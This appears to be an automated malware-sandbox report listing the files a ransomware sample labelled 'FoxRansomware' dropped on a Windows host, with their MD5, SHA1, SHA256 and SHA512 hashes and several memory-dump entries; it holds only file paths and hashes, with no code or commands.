c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWbpVd9W.exe

MD5
c82d64850d35cc6a536c11adbd261cf6

SHA1
9f4d070a1b4668d110b57c167c4527fa2752c1fe

SHA256
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1

SHA512
777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWbpVd9W.exe

MD5
c82d64850d35cc6a536c11adbd261cf6

SHA1
9f4d070a1b4668d110b57c167c4527fa2752c1fe

SHA256
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1

SHA512
777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y81a2v1H.txt

MD5
75564e2df4b8c8d33695e8e5e58cb03c

SHA1
64a796a9f01a1f12bcbe641ecc92541a41ece9b5

SHA256
bfc3a26300e7bd0144a9974a6cc1f88f555dd022002aab0166aa0813070a8965

SHA512
c24aa065ed61adf4f32d9dd1edd089163b0b953a10ef14f87f4095c0677cc27c684c3666ab1911e4e21f2517d1292454c3016255bb3279e2ff48a59257b455af

Download Submit
C:\Users\Admin\AppData\Roaming\iZwk4ceY.bat

MD5
bc437d5f4b394d9b7c95a84eafdd4c06

SHA1
f55e34c9a01e73116773f5ef56575ca97e5a279f

SHA256
230a56dd76b23b6d5f34e3eb176464525449aa283be1c8ab322ee742ac92bbaa

SHA512
dc7e854c428ae2b12b580d3fa9c07d8d1696558712bf2349e58b7edc6d15feeab0a535eb2e70f896bb4dbf891916aa192d788ea3ed1bd79a5f132aafeb8743c8

Download Submit
C:\Users\Admin\AppData\Roaming\jpMqGlzX.vbs

MD5
6dc84819915913e5c7f1d53d433d6c63

SHA1
7d9bc187bdee023e22792e960b8ba69c1f0b75ee

SHA256
89ea75533ecb630bde90666548787b41f61a08e8f17361a78267be867f905955

SHA512
0b4819d1216051eb05227c66b5a2f277050f236609ff4a223e55910f790a3785de8b3f3f563b032f754a2bb79e56f42a6175f817bbb0739876145af6e4e270f4

Download Submit
\Users\Admin\AppData\Local\Temp\8Pk9qSFt64.exe

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\NWbpVd9W.exe

MD5
c82d64850d35cc6a536c11adbd261cf6

SHA1
9f4d070a1b4668d110b57c167c4527fa2752c1fe

SHA256
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1

SHA512
777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\NWbpVd9W.exe

MD5
c82d64850d35cc6a536c11adbd261cf6

SHA1
9f4d070a1b4668d110b57c167c4527fa2752c1fe

SHA256
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1

SHA512
777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002

Download Submit
memory/1580-54-0x00000000754B1000-0x00000000754B3000-memory.dmp

Filesize
8KB

Download
memory/1948-61-0x00000000003A0000-0x00000000003E6000-memory.dmp

Filesize
280KB

Download
memory/1948-62-0x00000000003A0000-0x00000000003E6000-memory.dmp

Filesize
280KB

Download
memory/1948-63-0x00000000003A0000-0x00000000003E6000-memory.dmp

Filesize
280KB

Download